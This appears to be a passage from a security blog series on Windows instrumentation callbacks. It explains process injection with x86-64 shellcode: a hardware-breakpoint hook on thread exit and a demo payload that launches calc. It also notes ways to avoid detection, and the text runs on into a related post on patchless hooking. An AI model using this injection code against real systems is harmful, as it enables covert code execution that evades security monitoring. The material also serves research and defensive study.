also, for example, use page guards.

To keep this post brief, we will not cover the following relevant topics, as they are not specific to this injection technique and there are multiple ways of implementing those: process ID enumeration, handle opening, memory allocation, memory writing.

Only one note on handle opening: a careful reader of the OpenProcess MSDN page might have noticed the following part: "If the caller has enabled the SeDebugPrivilege privilege, the requested access is granted regardless of the contents of the security descriptor." As mentioned in the recap, we found out in the first blog post that the SeDebugPrivilege is required to set an IC on another process. Herein lies the fundamental "problem" of using an IC as an injection technique. The SeDebugPrivilege is a very powerful privilege, as it effectively disables security checks. This means the injector already needs extensive privileges on the computer to use an IC as an injection technique. As mentioned by Microsoft, members of the Administrators group have the SeDebugPrivilege by default. This also means that you need that privilege to test your injector, for example by launching it from an administrative PowerShell.

Core injection logic

To simplify the rest of the blog post, let’s define some words that we will use:

  • Payload: This is the code that should get executed as the goal of the injection, in our case it will be a WinExec call that spawns a calculator. In your case it could be whatever, it could for example also be a manual mapper that maps an entire DLL into the victim process.
  • Payload wrapper: This includes all the code that sets up the payload execution. We will define the specific requirements later, but the wrapper is what the IC will execute. It is basically the IC bridge from the previous posts with some additional logic. This time, however, it is injected into another process so that the IC executes it there rather than in our own process context. The wrapper remains static; only the payload changes.
  • Wrapped payload: Both the payload and the payload wrapper. The wrapped payload will be allocated and written to the victim process, not the payload and payload wrapper individually.

In the previous two blog posts we did not go into the build system, as we simply linked our C++ code with the assembly IC bridge; this time, however, we will do things differently. Both the payload and the payload wrapper need to be position-independent, as they are executed not in our process's context but in the victim's. This also means that we need both the start address and the size of the assembly code to copy it over to the other process. I find the easiest way to do this is to write the entire shellcode in an assembly file and use a build system such as CMake with pre-build steps. These steps first assemble the code and then write the result to a C++ header file that simply contains a C++ array with the assembled bytes.

In other words: the CMakeLists.txt file contains multiple add_custom_command calls. They first run the assembler (we're using nasm), then use objcopy to copy the .text section of the object file into a temporary binary file. Finally, they run a Python script that reads the binary file and converts it into a C++ array, which is written to a header file that is part of the CMake target's sources. In this case, we only did this for the payload wrapper.
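The last build step is simple enough to sketch. The post uses a Python script for it, and the following C++ function is only an equivalent illustration of the output format. The array name is hypothetical. The input is assumed to be the raw .text bytes produced by objcopy (for example with `objcopy -O binary -j .text`). The array is deliberately not const, so that it ends up in writable data and the placeholders described below can be patched in place.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <string>
#include <vector>

// Renders raw shellcode bytes as a C++ header with a mutable byte array and its size.
std::string to_header(const std::vector<uint8_t>& bytes, const std::string& name) {
    std::string out = "#pragma once\n#include <cstddef>\n#include <cstdint>\n\n";
    out += "inline uint8_t " + name + "[] = {";
    for (std::size_t i = 0; i < bytes.size(); ++i) {
        char buf[8];
        std::snprintf(buf, sizeof(buf), "%s0x%02x", i ? ", " : "", static_cast<unsigned>(bytes[i]));
        out += buf;
    }
    out += "};\ninline constexpr size_t " + name + "_size = sizeof(" + name + ");\n";
    return out;
}
```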

Payload

As mentioned before, we’re using nasm as assembler for this post. “;” marks comments in nasm.

For our testing we used the following hard-coded payload:

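mov ecx,0x636c6163 ; "calc" (zero-extended into rcx, so the pushed qword is null-terminated)
push rcx
mov rcx, rsp ; lpCmdLine = pointer to "calc"
mov edx, 1 ; uCmdShow = SW_SHOWNORMAL
mov r14,0x7fffffffffffffff ; placeholder, will be replaced with the address of WinExec

sub rsp, 0x28 ; Shadow space + alignment
call r14
add rsp, 0x30 ; 0x28 (shadow space + alignment) + 0x8 (pushed string)
ret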

As can be seen, a null-terminated “calc” string is pushed onto the stack and used as an argument to a call to 0x7fffffffffffffff after the stack was aligned (RSP % 0x10 = 0).
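The immediate 0x636c6163 is simply the ASCII string "calc" read as a little-endian integer. Because `mov ecx, imm32` zero-extends into rcx, the pushed 8-byte value also contains the terminating null bytes. A small helper (hypothetical name) that derives such immediates for strings of up to seven characters:

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <string>

// Packs up to 7 ASCII characters into a little-endian qword, leaving at least
// one zero byte so that the string pushed onto the stack is null-terminated.
uint64_t pack_le_string(const std::string& s) {
    assert(s.size() <= 7);
    uint64_t v = 0;
    for (std::size_t i = 0; i < s.size(); ++i)
        v |= static_cast<uint64_t>(static_cast<uint8_t>(s[i])) << (8 * i);
    return v;
}
```

Values above 0xffffffff (strings longer than four characters) need `mov rcx, imm64` instead of `mov ecx, imm32`.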

But why are we using 0x7fffffffffffffff as a call target? We aren't; we are simply using it as a placeholder. ASLR randomizes the memory address of, among other things, WinExec, which means that WinExec's address isn't known at compile time. There are two solutions for this:

  1. We add a dynamic resolution function to the shellcode with, for example, a PEB walk.
  2. We abuse the fact that ntdll, kernel32 and kernelbase (the DLLs we will require) are loaded at the same base address in all processes, since that address only changes on reboot. This means the address of WinExec in the injector is the same as in the process to inject into.

In this case we use option 2 to keep the shellcode small. Before the code is injected into the other process, a search function replaces 0x7fffffffffffffff with WinExec's correct address. This is possible because, as mentioned, we copy the assembled bytes into an array, so they reside in RW- memory rather than R-X memory. This could of course also be rewritten to read in a payload instead of having it hard-coded.
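The search-and-replace step could look like the sketch below. It searches the writable copy of the shellcode for the 8-byte little-endian encoding of the placeholder (FF FF FF FF FF FF FF 7F, the imm64 of `mov r14, 0x7fffffffffffffff`) and overwrites it with the real address. The function name is hypothetical, and resolving WinExec's address in the injector (e.g. via GetProcAddress) is assumed and not shown. The function requires exactly one match, which guards against accidentally patching unrelated bytes.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

constexpr uint64_t kPlaceholder = 0x7fffffffffffffffULL;

// Replaces the single occurrence of `placeholder` (little-endian imm64) in
// `code` with `value`. Returns false if it occurs zero times or more than once.
bool patch_placeholder(std::vector<uint8_t>& code, uint64_t placeholder, uint64_t value) {
    uint8_t needle[8], repl[8];
    for (int i = 0; i < 8; ++i) {
        needle[i] = static_cast<uint8_t>(placeholder >> (8 * i));
        repl[i] = static_cast<uint8_t>(value >> (8 * i));
    }
    std::size_t hit = SIZE_MAX;
    for (std::size_t i = 0; i + 8 <= code.size(); ++i) {
        if (std::memcmp(&code[i], needle, 8) != 0) continue;
        if (hit != SIZE_MAX) return false;  // ambiguous: more than one match
        hit = i;
    }
    if (hit == SIZE_MAX) return false;
    std::memcpy(&code[hit], repl, 8);
    return true;
}
```

The same routine would also work for the flag-address placeholder described later, provided a distinct placeholder value is used.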

The payload can be anything, as long as it considers the following restrictions:

  • Needs to be position-independent
  • Needs to properly restore the stack after execution or terminate its own thread

Payload wrapper

So, what does the payload wrapper need to include? Everything needed to correctly set up the payload execution, in other words all the IC logic. First off, we don't want our payload to execute multiple times, which in our example would mean multiple calculators popping up. If we don't want to unregister our IC after execution, we need a flag signaling that the payload was already executed. As the payload should execute once per process and not once per thread, this must be a process-wide flag. We will implement a process-wide flag and not unregister the IC, as we can't spoon-feed you everything 😉

Also, as mentioned, we will set a hardware breakpoint on a thread exit (RtlExitUserThread). Setting the hardware breakpoint again and again on every IC call would be very inefficient. So, we also need a thread-local flag signaling that the breakpoint was set, so that this step is skipped on all following IC calls from that thread.

The injected IC should execute the following rough pseudo-code logic:

bool payload_executed = false                      // process-wide (RW- flag page)
thread_local bool thread_set_hardware_bp = false   // one per thread
callback(void* ic_origin) {
  if (!payload_executed && !thread_set_hardware_bp) {
    thread_set_hardware_bp = true                  // set before the syscall to avoid recursion
    if (!set_hwbp(RtlExitUserThread))              // Does syscall
      thread_set_hardware_bp = false
    return
  }
  if (!is_exception(ic_origin))
    return
  if (exception_origin != RtlExitUserThread)       // e.g. the address from the exception record
    return
  remove_hwbp(RtlExitUserThread)                   // Does syscall
  if (!payload_executed) {
    payload_executed = true
    execute_payload()                              // (Most likely) does syscall
  }
  restore_context()
}

In the previous posts we used a flag to avoid recursion; in this case we don’t need a second thread-local flag. Before the breakpoint has been set, the only syscalls the IC issues itself come from set_hwbp, which is why thread_set_hardware_bp is set before that call and cleared again if the breakpoint could not be set.

This means that GetThreadContext and SetThreadContext, the two functions that issue syscalls down the line, trigger the IC again, but since these invocations are not the expected exception, the IC simply returns.
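To check that one process-wide flag plus one thread-local flag really limits the payload to a single run, the pseudo code can be modeled in portable C++. This is a hypothetical simulation, not the shellcode: Event, ThreadState, Process and callback are our own names, threads are represented by explicit ThreadState objects instead of thread_local storage, and the syscall-issuing calls (set_hwbp, remove_hwbp, execute_payload) are replaced by counters.

```cpp
#include <cassert>

// Hypothetical, single-threaded model of the wrapper's flag logic.
// Nothing here touches debug registers; counters stand in for the real calls.
enum class Event { Syscall, ExitBreakpoint, OtherException };

struct ThreadState {
    bool thread_set_hardware_bp = false;  // per-thread flag (a TEB field in the wrapper)
};

struct Process {
    bool payload_executed = false;        // process-wide flag (RW- page in the wrapper)
    int breakpoints_set = 0;              // how often set_hwbp would have been called
    int payload_runs = 0;                 // how often the payload would have run
};

// One IC invocation in thread `t`; returns true if the context would be restored.
bool callback(Process& p, ThreadState& t, Event e) {
    if (!p.payload_executed && !t.thread_set_hardware_bp) {
        t.thread_set_hardware_bp = true;  // set *before* the syscall-issuing call
        ++p.breakpoints_set;              // stands in for set_hwbp(RtlExitUserThread)
        return false;
    }
    if (e != Event::ExitBreakpoint)       // not an exception, or not our breakpoint
        return false;
    // remove_hwbp(RtlExitUserThread) would be issued here
    if (!p.payload_executed) {
        p.payload_executed = true;
        ++p.payload_runs;                 // execute_payload()
    }
    return true;                          // restore_context()
}
```

Like the cmp/mov pair in the assembly, the check-and-set of payload_executed in this model is not atomic; if two threads could reach the exit breakpoint at the same moment, an atomic exchange (for example lock cmpxchg) would be the safer choice.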

A process-wide flag can be implemented by allocating memory with read and write permissions and using an address inside it as the flag. As we want to avoid RWX allocations, which are highly suspicious, we need two memory regions with different permissions: RW- for the flag and R-X for the code itself. This causes another issue: because the flag is allocated dynamically, its address is not known when the wrapper is assembled. If the injected code allocated the flag itself, it would only know the flag’s address during the IC call that performed the allocation: the code region is not writable, so the address could not be stored for later calls.

Our solution is to use a placeholder address for the flag, just as we did for the WinExec address in the payload. The injector first allocates the memory for the flag, then searches the compiled wrapper (written to a byte array by the prebuild steps) for the placeholder, replaces it with the address of the allocated memory and only then writes the wrapper to the victim process.
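The placeholder replacement can be sketched as a small search-and-replace over the assembled bytes. replace_placeholder is a hypothetical helper, not the authors’ code; it assumes the placeholder is stored as a little-endian 64-bit immediate, as in a mov r64, imm64 instruction on x86-64.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Replaces every occurrence of an 8-byte placeholder (e.g. 0x2CCCCCCCCCCCCCCC)
// in an assembled byte array with `value`. x86-64 stores immediates
// little-endian, so the least significant byte comes first in memory.
// Returns the number of replacements made.
std::size_t replace_placeholder(std::vector<std::uint8_t>& code,
                                std::uint64_t placeholder, std::uint64_t value) {
    std::uint8_t needle[8], repl[8];
    for (int i = 0; i < 8; ++i) {
        needle[i] = static_cast<std::uint8_t>(placeholder >> (8 * i));
        repl[i] = static_cast<std::uint8_t>(value >> (8 * i));
    }
    std::size_t count = 0;
    for (std::size_t off = 0; off + 8 <= code.size();) {
        if (std::memcmp(code.data() + off, needle, 8) == 0) {
            std::memcpy(code.data() + off, repl, 8);
            ++count;
            off += 8;  // skip the bytes that were just written
        } else {
            ++off;
        }
    }
    return count;
}
```

Returning the number of replacements makes it easy to detect a placeholder that is missing from the array. The approach relies on the placeholder values being distinctive enough not to appear elsewhere in the machine code by accident.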

Setting a hardware breakpoint

As mentioned, we will use the same hooking technique as in the previous blog post to hook RtlExitUserThread, except that this time the code has to be injected into the other process, so it needs to be position-independent shellcode instead of a regular C++ function. This applies not only to setting the hardware breakpoint but to all the code that gets injected. As this involves a fair amount of assembly, let’s start by writing the helper functions before the core execution logic.

Roughly, the helper does the following:

bool set_dr(DWORD64 bp_address, bool enable) {
   CONTEXT context = { .ContextFlags = CONTEXT_DEBUG_REGISTERS };
   if (!GetThreadContext(GetCurrentThread(), &context))
      return false;
   context.Dr3 = bp_address;
   // Clear Dr3's local enable (bit 6), R/W3 (bits 28-29) and LEN3 (bits 30-31)
   context.Dr7 &= ~((3ULL << 28) | (3ULL << 30) | (1ULL << 6));
   if (enable)
      context.Dr7 |= 1ULL << 6; // Local enable for Dr3: execute breakpoint, length 0
   return SetThreadContext(GetCurrentThread(), &context) != FALSE;
}

In assembly, this can be implemented roughly as follows. We hard-coded Dr3 for no particular reason; you could of course use another debug register or make the register configurable.

; rcx = breakpoint address
; rdx = Enable (1) / Disable (0)
; Return: Rax != 0 = success
; RSP needs to be aligned
set_dr:
   ; Save used registers
   push r14
   push r13
   push rdi
   push rbx
   mov r13, rcx
   mov rbx, rdx
   sub rsp, 0x4d8 ; Size of CONTEXT struct + 8 alignment
   mov rdi, rsp ; CONTEXT base
   mov r14, rdi ; rep stosq changes rdi, this is backup
   ; Zero CONTEXT struct
   mov rcx, 0x9a ; (4d0 / 8) --> amount of uint64_t's
   xor rax, rax
   rep stosq
   ; CONTEXT_DEBUG_REGISTERS
   mov dword [r14 + 0x30], 0x00100010
   ; GetCurrentThread() == -2
   xor rcx, rcx
   dec rcx
   dec rcx
   ; The saved CONTEXT base
   mov rdx, r14
   ; Shadow space
   sub rsp, 0x20
   ; GetThreadContext placeholder
   mov rdi, 0x6CCCCCCCCCCCCCCC
   call rdi
   add rsp, 0x20 ; Shadow space
   ; if return value == 0 it errored
   test rax, rax
   jz _set_dr_ret
   ; Set Dr3
   mov qword [r14 + 0x60], r13
   ; offsetof(CONTEXT, Dr7) = 0x70
   mov rcx, [r14 + 0x70]
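   ; Clear Dr3-specific bits: L3 (bit 6), R/W3 (bits 28-29), LEN3 (bits 30-31)
   ; The mask does not fit into a sign-extended imm32, so load it into rax first
   mov rax, ~((3 << 28) | (3 << 30) | (1 << 6))
   and rcx, rax
   test rbx, rbx
   jz _skip_enable_bp
   ; Set local Dr3 enable (R/W3 = 00 for execute, LEN3 must be 00)
   or rcx, (1 << 6)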
_skip_enable_bp:
   ; Dr7 = new Dr7
   mov [r14+0x70], rcx
   ; SetThreadContext
   xor rcx, rcx
   dec rcx
   dec rcx
   mov rdx, r14
   ; Shadow space
   sub rsp, 0x20
   ; SetThreadContext placeholder
   mov rdi, 0x5CCCCCCCCCCCCCCC
   call rdi
   add rsp, 0x20 ; Shadow space
_set_dr_ret:
   add rsp, 0x4d8 ; + 8 alignment
   pop rbx
   pop rdi
   pop r13
   pop r14
   ret
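The Dr7 arithmetic in set_dr can be checked without a Windows machine using a constexpr model. The constant and function names are hypothetical; the bit positions follow the DR7 layout in the Intel SDM, where Dr3’s local enable bit is bit 6, its condition field (R/W3) is bits 28-29 and its length field (LEN3) is bits 30-31.

```cpp
#include <cstdint>

// Dr7 fields belonging to Dr3 (Intel SDM DR7 layout).
constexpr std::uint64_t kDr3LocalEnable = 1ull << 6;   // L3
constexpr std::uint64_t kDr3RW = 3ull << 28;           // R/W3: 00 = execute
constexpr std::uint64_t kDr3Len = 3ull << 30;          // LEN3: must be 00 for execute

// Hypothetical model of the Dr7 update in set_dr: clear Dr3's fields, then
// optionally set its local enable bit (execute breakpoint, length 00).
constexpr std::uint64_t update_dr7_for_dr3(std::uint64_t dr7, bool enable) {
    dr7 &= ~(kDr3LocalEnable | kDr3RW | kDr3Len);
    if (enable)
        dr7 |= kDr3LocalEnable;
    return dr7;
}

// A Dr0 write breakpoint (L0 = bit 0, R/W0 = 01 at bits 16-17) survives a Dr3 update.
static_assert(update_dr7_for_dr3(0x1ull | (1ull << 16), true) ==
              (0x1ull | (1ull << 16) | (1ull << 6)));
// Disabling Dr3 clears its enable bit and any stale R/W3 bits.
static_assert(update_dr7_for_dr3(0x40ull | (3ull << 28), false) == 0);
```

The static_assert checks show that breakpoints configured in the other debug registers are left untouched.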

Flag helper functions

For the process-wide flag, we will use a placeholder (0x2CCCCCCCCCCCCCCC) that the injector replaces with the address of the allocated flag. For the thread-local flag, we will again use the Thread Environment Block (TEB), specifically its InstrumentationCallbackDisabled field. There are less suspicious ways of doing this.

load_bp_set_ptr_into_rcx:
; TEB 
mov rcx, gs:[30h]
; TEB->InstrumentationCallbackDisabled 
add rcx, 1b8h
ret
load_bitflag_into_rcx:
; rcx = pointer bit flag (placeholder currently)
mov rcx, 0x2CCCCCCCCCCCCCCC
ret

Execution logic

Looking back at the pseudo code, we have set_hwbp and remove_hwbp covered and, through the helper functions, access to both flag variables, so let’s implement the core logic. One requirement I didn’t mention in the pseudo code is stack alignment: the stack is not guaranteed to be 16-byte aligned when the callback is entered (RSP % 0x10 is sometimes 0 and sometimes 8). To avoid issues, we align the stack manually so that all Windows API calls as well as the payload call are made with a 16-byte-aligned stack. So that the stack can be restored properly, we don’t simply overwrite RSP; instead, we push a marker value (0xDEADBEEF) and check for it when returning to see whether the stack was adjusted.

entry:
; The actual return address of the IC
push r10
push r14
mov r14, rsp
add r14, 0x10
push rax
push rcx
push rdx
; Rsp should be aligned for both cases, so it’s done here
mov rdx, rsp
and dl, 0xF
cmp dl, 0x8
jne _skip_align
mov rdx, 0xDEADBEEF
push rdx
_skip_align:
call load_bp_set_ptr_into_rcx
xor rax, rax
cmp [rcx], rax
; Thread-local flag still 0: breakpoint not set yet in this thread
je _hwbp_is_set
; […] “is_exception” check and payload execution (shown further below)
_hwbp_is_set:
; […]
_ret_unalign:
; Unalign rsp if it was previously modified
cmp dword [rsp], 0xDEADBEEF
jne _ret
add rsp, 8
_ret:
pop rdx
pop rcx
xor rcx, rcx
pop rax
pop r14
; r10 still on top of stack -> return to it
ret
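The alignment logic in entry boils down to simple arithmetic, modeled here as a hypothetical constexpr function. It assumes the five 8-byte pushes shown above (r10, r14, rax, rcx, rdx) and that RSP is either 16-byte aligned or off by 8 when the IC is entered.

```cpp
#include <cstdint>

// Hypothetical model of `entry`: five 8-byte pushes, then one extra push of the
// 0xDEADBEEF marker if RSP ends in 8. Returns RSP as seen after _skip_align.
constexpr std::uint64_t rsp_after_entry(std::uint64_t rsp_at_ic_entry) {
    std::uint64_t rsp = rsp_at_ic_entry - 5 * 8;  // push r10 ... push rdx
    if ((rsp & 0xF) == 0x8)
        rsp -= 8;                                  // push 0xDEADBEEF marker
    return rsp;
}

// Both possible entry alignments end up 16-byte aligned.
static_assert(rsp_after_entry(0x1000) % 16 == 0);  // aligned entry RSP
static_assert(rsp_after_entry(0x1008) % 16 == 0);  // entry RSP % 16 == 8
```

With an aligned entry RSP, the five pushes leave RSP off by 8, so the marker is pushed; with RSP % 16 == 8 on entry, no marker is needed.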

First execution

To follow the execution flow logically, let’s first cover what happens when an IC is triggered for the first time in a thread, i.e. the code at the _hwbp_is_set label, which the entry code jumps to while the thread-local flag is still 0. Let’s look at the relevant excerpt from the pseudo code:

[…]
if (!payload_executed && !thread_set_hardware_bp) {
   thread_set_hardware_bp = true
   if (!set_hwbp(RtlExitUserThread)) // Does syscall
     thread_set_hardware_bp = false   
   return
}
[…]

The first line of this pseudo code was already partially implemented in the execution logic chapter; only the first part of the if statement, the check whether the payload was already executed, is missing. In addition, we need to set the flag indicating that the hardware breakpoint was set before calling set_dr, so that the syscalls it issues don’t run this logic again recursively. If setting the HWBP fails, the flag is cleared again.

As we already wrote our helper functions to retrieve the flag addresses and set a breakpoint, this is simply a matter of combining things:

_hwbp_is_set:
call load_bitflag_into_rcx
xor rax, rax
inc rax
; Was payload already executed? If yes, don’t set BP
cmp [rcx], rax
je _ret_unalign
; Set BP set flag to avoid recursion
call load_bp_set_ptr_into_rcx
xor rax, rax
inc rax
; bp set flag = 1
mov [rcx], rax
; RtlExitUserThread placeholder
mov rcx, 0x3CCCCCCCCCCCCCCC
xor rdx, rdx
inc rdx ; Enable hwbp
call set_dr
; Succeeded (rax != 0)? Then keep the flag and return
test rax, rax
jnz _ret_unalign
; Failed: bp set flag = 0 to retry on the next IC trigger
call load_bp_set_ptr_into_rcx
xor rax, rax
mov [rcx], rax
; Fall through on purpose to return
_ret_unalign:
; […]

After HWBP was set

Let’s return to the pseudo code. We already wrote the code for the first execution within a thread and the logic to set a HWBP. All that’s left to implement is the following excerpt:

bool payload_executed = false                    // process-wide flag
thread_local bool thread_set_hardware_bp = false // per-thread flag
callback(void* ic_origin) {
   […]
   if (!is_exception(ic_origin))
      return
   if (exception_origin != RtlExitUserThread) // exception_origin = Rip in the exception's CONTEXT
      return
   remove_hwbp(RtlExitUserThread) // Does syscall
   if (!payload_executed) {
      payload_executed = true
      execute_payload() // (Most likely) does syscall
   }
   restore_context()
}

We already implemented most of the required logic in the second part of this series, just in C++. If you are unsure how to detect whether the IC was triggered by a HWBP and how to resume execution after a HWBP was triggered, we recommend rereading the second part of this series and then returning to this point. For example, we will not explain again why we need to intercept KiUserExceptionDispatcher.

Alright, back to coding:

; […]
; Check if the hardware breakpoint was triggered
; KiUserExceptionDispatcher placeholder
   mov rcx, 0x4CCCCCCCCCCCCCCC
   cmp r10, rcx
   jne _ret_unalign
; r14 is still the top of the original stack
; this should be a CONTEXT*; if it is a nullptr, it's bad :)
   test r14, r14
   jz _ret_unalign
   ; Exception thrown, but is it ours?
   ; RtlExitUserThread placeholder
   mov r10, 0x3CCCCCCCCCCCCCCC
   mov rcx, [r14+0xf8]
   cmp r10, rcx
   ; Not our exception
   jne _ret_unalign
   ; Unset bp
   xor rcx, rcx
   xor rdx, rdx
   call set_dr
   call load_bitflag_into_rcx
   ; Save context base
   push r14
   ; payload was already executed
   cmp qword [rcx], 1
   je _restore_context
   ; Set payload executed flag
   mov qword [rcx], 1
   ; Shadow space + 8 bytes: push r14 left RSP misaligned by 8
   sub rsp, 0x28
   call payload
   add rsp, 0x28
   ; as you can see, the payload must not mangle the stack,
   ; otherwise it should call RtlExitUserThread itself;
   ; if it mangled the stack, rcx wouldn’t be the context base in the next line
_restore_context:
   ; Restore context base to rcx     
   pop rcx
   ; Set ResumeFlag in EFlags register
   or dword [rcx+0x44], 0x10000
   ; ExceptionRecord = nullptr
   xor rdx, rdx
   ; Call RtlRestoreContext
   sub rsp, 0x20
   mov rdi, 0x8CCCCCCCCCCCCCCC
   call rdi
   ; RtlRestoreContext doesn’t return

If you read carefully and/or tried to assemble the code yourself, you might’ve noticed that the ‘payload’ label is missing. Where does it come from? Simple: we place the payload label at the very end of the wrapper code, so call payload is assembled as a relative call. That way, we can append the payload to the end of the payload wrapper and the wrapper will execute it, even if the payload and the wrapper were assembled separately and the two byte arrays were simply concatenated.
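Because the call to payload is relative, combining the two arrays is a plain concatenation. The sketch uses hypothetical helper names and assumes the wrapper ends exactly at the payload label; call_target decodes an E8 rel32 near call to show where such a call lands.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Appends the separately assembled payload to the wrapper. Since `payload` is
// the wrapper's last label, `call payload` already points at the wrapper's end.
std::vector<std::uint8_t> append_payload(const std::vector<std::uint8_t>& wrapper,
                                         const std::vector<std::uint8_t>& payload) {
    std::vector<std::uint8_t> out(wrapper);
    out.insert(out.end(), payload.begin(), payload.end());
    return out;
}

// Decodes the target offset of an `E8 rel32` call located at `offset`.
// rel32 is little-endian and relative to the end of the 5-byte instruction.
std::int64_t call_target(const std::vector<std::uint8_t>& code, std::size_t offset) {
    std::uint32_t raw = 0;
    for (int i = 0; i < 4; ++i)
        raw |= static_cast<std::uint32_t>(code[offset + 1 + i]) << (8 * i);
    const auto rel32 = static_cast<std::int32_t>(raw);
    return static_cast<std::int64_t>(offset) + 5 + rel32;
}
```

For example, a wrapper consisting of E8 01 00 00 00 C3 (call +1; ret) calls offset 6, which is exactly the first byte of any payload appended to it.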

If you made it this far and understood what we were doing, congrats! You’ve pulled through, now we can finally transition back to C++.

C++ code

If you followed our recommendation of using CMake or another build system with prebuild steps that assemble the assembly and transform it into a byte array, you should now have two arrays: one for your payload and one for the wrapper. If you only have one fixed payload that you always want to use, you could of course also assemble the payload and the wrapper together or concatenate them directly in a prebuild step.

Now you need to replace the placeholders in that/those byte arrays. You could of course also add a PEB walk to dynamically retrieve the required function addresses and not use placeholders; we decided against this for our wrapper for size reasons and to keep the blog post brief.

Speaking of which, the blog post is already pretty long, so we’ve decided not to include any of our C++ code 😉. If you understood the blog series so far, searching for 8-byte values in a byte array and replacing them should be an easy task for you. Going through the assembly again, you will need to replace the placeholders 0x2CCCCCCCCCCCCCCC through 0x8CCCCCCCCCCCCCCC; the comments next to them state which address each one requires. The flag placeholder simply requires a small allocation with read and write permissions in the target process; note that the wrapper reads and writes the flag as a qword, so it should be at least 8 bytes (VirtualAllocEx rounds allocations up to whole pages anyway).

After replacing the placeholders and combining everything into one array/vector, the data needs to be written to an executable memory region in the victim process. This requires a process handle that allows writing memory (PROCESS_VM_WRITE and PROCESS_VM_OPERATION) and, if any allocations are done, allocating memory (PROCESS_VM_OPERATION). After the shellcode has been copied over, an IC needs to be set on the other process, with the callback pointing to the start of the copied shellcode. For this, a handle with the PROCESS_SET_INFORMATION access right is required. Keep in mind that you need the SeDebugPrivilege to set an IC on another process. You can, for example, start your program from an administrative PowerShell.

Closing words

In this blog post you learned how to write the shellcode required to inject a payload into another process with ICs. Hopefully you also managed to write the required C++ code yourself. This is of course not the only way to use ICs for injection. To my knowledge, ICs are the most powerful Windows feature usable from user mode. Overall, we only covered a fraction of what is possible with ICs; for example, we haven’t covered getting callbacks for APCs with them.

ICs aren’t only usable in offensive ways though; they are, for example, also very interesting for EDRs and anti-cheats.

The first three parts of this series focused mainly on offensive use cases of ICs. In the next and last part of this series, we will discuss ICs from a more defensive standpoint: how they can be detected and how to detect whether someone overwrote your IC.

Further blog articles

AD Security

Microsoft Defender for Identity evasions in 2026 – Part II

June 17, 2026 – The first blogpost highlighted the detection capabilities and the resulting evasion options for Microsoft Defender for Identity (DfI). To complement the first part, the second part will present some alternative detection possibilities for the defensive side to improve visibility and security, as well as the upgrade from DfI version 2.2 to DfI version 3.0.

Author: Jakob Scholz

Red Teaming

Windows Instrumentation Callbacks – Part 4

February 10, 2026 – In this blog post we will cover ICs from a more theoretical standpoint. Mainly restrictions on unsetting them, how set ICs can be detected and how new ones can be prevented from being set. Spoiler: this is not entirely possible.

Author: Lino Facco

Reverse Engineering

Windows Instrumentation Callbacks – Part 3

January 28, 2026 – In this third part of the blog series, you will learn how to inject shellcode into processes with ICs as an execution mechanism without creating any new threads for your payload and without installing a vectored exception handler.

Author: Lino Facco

November 12, 2025

Windows Instrumentation Callbacks – Hooks, Part 2

Introduction

This multi-part blog series will be discussing an undocumented feature of Windows: instrumentation callbacks (ICs).

If you have not yet read the first part of this series, we strongly recommend you read it to find out what ICs are and how to set them.

In this blog post you will learn how to do patchless hooking using ICs without registering or executing any user mode exception handlers.

Disclaimer

  • This series is aimed towards readers familiar with x86_64 assembly, computer concepts such as the stack and Windows internals. Not every term will be explained in this series.
  • This series is aimed at x64 programs on Windows 10 and 11. Neither older Windows versions nor WoW64 processes will be discussed.

Recap

In the first blog post we learned how to install an IC on a process and how to use that callback to interact with specific syscalls. We learned this by intercepting the syscall made by OpenProcess inside its subfunction NtOpenProcess. After intercepting NtOpenProcess, we closed the handle that was opened and spoofed a return value of STATUS_ACCESS_DENIED. This gives us a callback whenever a syscall returns; however, it does not allow hooking arbitrary code. Also consider this: a program calls NtSetInformationProcess to set its own IC after you have already set an IC. Which IC do you think is called? Your original IC or the new IC passed in NtSetInformationProcess? Give it a try.

Hooking

If you are reading this article, there’s a good chance you know what patchless hooking is. If you don’t, we will explain the patchless part; however, you are assumed to know what hooking in general refers to.

There are many hooking techniques, but each of them is either patchless or requires a patch. Regular inline hooks work by patching the executable memory or the binary to redirect execution to the code of the installed hook. If someone hooks a binary file on disk by changing (patching) its bytes, the binary’s signature changes, as the binary no longer contains the same bytes.

Patchless hooking

As you might’ve guessed, patchless hooking techniques are techniques that do not require a patch. This means, none of the bytes in the executable memory region that is to be hooked are changed, so the signature of that memory region stays the same, meaning the hook can’t be detected by signature scans.

The most common patchless hooking techniques in Windows user mode are probably vectored exception handler (VEH) hooking and page guard hooking. Both these techniques utilize a core concept of Windows and operating systems in general: exceptions.

Page guard hooking works by setting the PAGE_GUARD memory page protection modifier on a certain memory page. Once that memory page is accessed, the system raises an exception that can be handled by an exception handler.

VEH hooking also requires setting up an exception handler, but instead of page guards, hardware breakpoints are used to trigger the exceptions.

Unlike a software breakpoint, such as the int3 instruction that __debugbreak() inserts into your C/C++ code, a hardware breakpoint does not modify the code; it is generated by the CPU itself.

Hardware breakpoints can be set with specific registers in x86_64 CPUs:

  • Dr0-3: These four registers contain the addresses of where the breakpoint should be set.
  • Dr6: This is the status register that contains information about which breakpoint fired during exception handling.
  • Dr7: This is the control register that, using bit flags, controls which debug registers are active and what type of breakpoint is used: execute, write or read/write.

Exceptions and vectored exception handling

In short, VEHs allow developers to register their own exception handler. For this, Microsoft provides the function AddVectoredExceptionHandler. Let’s look at the function definition:

PVOID AddVectoredExceptionHandler(
ULONG                       First,
PVECTORED_EXCEPTION_HANDLER Handler
);

The function takes a pointer to an exception handler function and a ULONG parameter. Internally, Windows stores the pointers to all the exception handlers in a linked list. If the ULONG parameter, i.e. the parameter called First, is not zero, the exception handler is added to the start of the linked list instead of the end.

The Handler parameter takes a function pointer to the exception handler that should be added. The function should look as follows according to MSDN:

LONG PvectoredExceptionHandler(
[in] _EXCEPTION_POINTERS *ExceptionInfo
)

The function takes a pointer to an EXCEPTION_POINTERS structure, which holds the information about the exception that occurred. Most importantly, it holds a pointer to a CONTEXT structure describing the thread’s state when the exception occurred. The CONTEXT structure holds processor-specific register data, such as the member Rip, which contains the value the rip register had when the exception occurred.

According to documentation, the exception handler should either return EXCEPTION_CONTINUE_EXECUTION (-1) or EXCEPTION_CONTINUE_SEARCH (0). This is used by Windows to decide whether the exception was handled or if the executed exception handler could not/did not want to handle the exception.

